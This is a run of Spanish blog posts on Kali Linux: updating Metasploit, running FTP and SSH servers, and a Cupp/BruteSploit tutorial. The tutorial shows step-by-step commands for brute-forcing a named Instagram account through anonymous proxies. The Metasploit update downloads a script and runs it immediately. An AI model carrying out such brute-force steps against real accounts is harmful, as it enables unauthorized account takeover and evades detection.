viernes, 30 de marzo de 2018

Actualizar metasploit en Kali Linux Moto

Hola amigos.

Si tenéis Kali Linux Moto y queréis actualizar metasploit, es muy fácil, además, vale para 32 bits.

Sólamente hay que abrir una consola y poner, todo seguido, en una misma línea:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall &&  chmod 755 msfinstall &&  ./msfinstall

Eso sí, ahora, para integrarla con postgresql tenemos que seguir los pasos

service postgresql start

msfdb init

abrimos metasploit:

msfconsole

Y ponemos

db_rebuild_cache

Y yá está todo.

viernes, 23 de marzo de 2018

Servidor ftp en Kali LInux

Este post, está dedicado a Gabriel, el pescaito


Hola amigos.
En esta ocasión, vamos a crear un servidor ftp en nuestro Kali Linux.
La idea de esto es, por si necesitamos en nuestras “investigaciones”.
En primer lugar, ponemos

apt-get install vsftpd

Editamos /etc/vsftpd.conf

Aquí, podemos cambiar la configuración de nuestro servidor.

El parametro listen nos indica si queremos que se inicie al iniciar el sistema. Lo dejaré por defecto, NO.
anonymous_enable indica si queremos que cualquier persona pueda acceder a nuestro servidor como anónimo. Anonimous es una especie de cuenta de ftp que permite que cualquier persona pueda visitar nuestro servidor. En este caso, pondré que sí

anonymous_enable=YES

local_enable nos indica que va a permitir a los usuarios del sistema, loguearse en el servidor. Lo dejaré como está

local_enable=YES

Existen otros parámetros. Leed su descripción y configurarlos según deseeis.



El directorio por defecto al que se accederá es a /srv/ftp/ del servidor. Para cambiarlo, añadimos en el archivo de configuración.

Si queremos un usuario anónimo, en el fichero de configuración añadiríamos:

anon_root=/var/ftp/
no_anon_password=YES


Guardamos y cerramos.

En la terminal, ponemos

mkdir /var/ftp/

Si tenemos el usuario anónimo activado, debemos hacer lo siguiente en la terminal.:

chown nobody:nogroup /srv/ftp


Para iniciar el servidor ponemos

service vsftpd start

viernes, 9 de marzo de 2018

Tutorial Cupp y Brutesploit

Hola amigos.

Hoy vamos ver las herramientas cupp y brutesploit.

Cupp es un script que nos va a ayudar a crear un diccionario de conocimiento para después hacer fuerza bruta.

Y en este caso, veremos cómo hacer fuerza bruta con bruesploit.

Dos posts en uno.

En primer lugar, nos descargamos cupp, lo podemos hacer por

apt-get install cupp

o a través de su repositorio en github:


Tendremos varias opciones

-i Inicia el modo interactivo.
-w Usa un diccionario ya existente.
-l Descarga diccionarios del repositorio
-a Usa usuarios y contraseñas de AlectoDB

El archivo cupp.cfg es el fichero de configuración, en el que podemos cambiar las combinaciones de la generación de diccionarios.



Ahora, instalaremos brutesploit


Nos metemos en el directorio BruteSploit

cd BruteSploit

Asignamos permisos de ejecución

chmod +x Brutesploit

Ejecutamos

./Brutesploit



El programa va por módulos. Para mostrarlos usaremos

show modules

Por ejemplo, vamos a realizar un ataque para instagram:

list 0e



use 0e4



show options



Configuramos las distintas opciones con set

set username manugomez1977

set wordlist /root/cupp/alfonso.txt

Para el proxy, abrimos en otra terminal y ponemos

nano /root/proxys.txt

Y ponemos una lista de proxys en formato

ip:port

Podéis encontrar listas de proxys anonimos en https://hidemy.name/es

Guardaremos, cerraremos y, en la terminal de BruteSploit

set proxy /root/proxys.txt

set threads 5

run






viernes, 2 de marzo de 2018

Servidor ssh en Kali

En primer lugar, ponemos

apt-get install openssh-server openssh-client

Las configuraciones del servidor, están en /etc/ssh/sshd_config

Lo editamos

Descomentamos ListenAddres y ponemos:

ListenAddress 192.168.1.131

Dejamos:
Protocol 2

Si cambiamos

PermitRootLogin prohibit-password

por

PermitRootLogin no

Hacemos que no podamos correrlo directamente desde root, tendríamos que logearnos como un usuario normal y correrlo con sudo, de esta manera, podemos evitar ataques a las contraseñas de root.

Para iniciarlo basta con poner

service ssh start